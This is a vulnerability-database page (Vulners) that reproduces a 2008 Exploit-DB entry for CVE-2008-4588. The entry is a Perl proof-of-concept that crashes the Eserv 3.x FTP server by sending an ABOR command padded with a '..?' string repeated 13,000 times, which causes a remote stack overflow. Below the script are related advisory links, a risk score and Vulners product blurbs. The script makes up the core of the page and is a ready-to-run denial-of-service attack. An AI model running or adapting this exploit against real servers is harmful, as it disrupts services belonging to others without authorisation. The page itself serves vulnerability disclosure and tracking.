Lucene search
+L

Eserv 3.x - FTP Server (ABOR) Remote Stack Overflow (PoC)

🗓️ 14 Oct 2008 00:00:00Reported by LiquidWormType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 36 Views

Eserv/3.x - FTP Server Remote Stack Overflow Po

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2008-4588
15 Oct 200822:45
attackerkb
circl
Circl
CVE-2008-4588
14 Oct 200800:00
circl
cve
CVE
CVE-2008-4588
15 Oct 200822:00
cve
cvelist
Cvelist
CVE-2008-4588
15 Oct 200822:00
cvelist
euvd
EUVD
EUVD-2008-4568
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-4588
15 Oct 200822:45
nvd
prion
Prion
Stack overflow
15 Oct 200822:45
prion
zeroscience
Zero Science Lab
Eserv 3.x FTP Server (ABOR) Remote Stack Overflow PoC
14 Oct 200800:00
zeroscience
#!/usr/bin/perl
#
# Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC
#
# Summary: Eserv/3.x - Mail, News, Web and Proxy Servers - Mail
# Server (SMTP, IMAP4 and POP3) - News Server (NNTP) - Web Server
# (HTTP) - FTP Server - Proxy Servers (HTTP, FTP, Socks, etc) - Finger
# Server - Built-in scheduler and dialer.
#
# Product web page: http://www.eserv.ru/ | www.etype.net/eserv/
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm [t00t] gmail.com
#
# http://www.zeroscience.org
#
# 14.10.2008
#

use Net::FTP;

$ipaddr = "127.0.0.1";
$mana = "..?" x 13000;
$user = "admin";
$pass = "nimda";
$port = 21;

$ftp = Net::FTP->new("$ipaddr", Debug => 0) || die "Cannot connect to $ipaddr on port $port: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;

$ftp->abor($mana);

$ftp->quit;

print "\nDone!\n";

# milw0rm.com [2008-10-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Oct 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.06823
36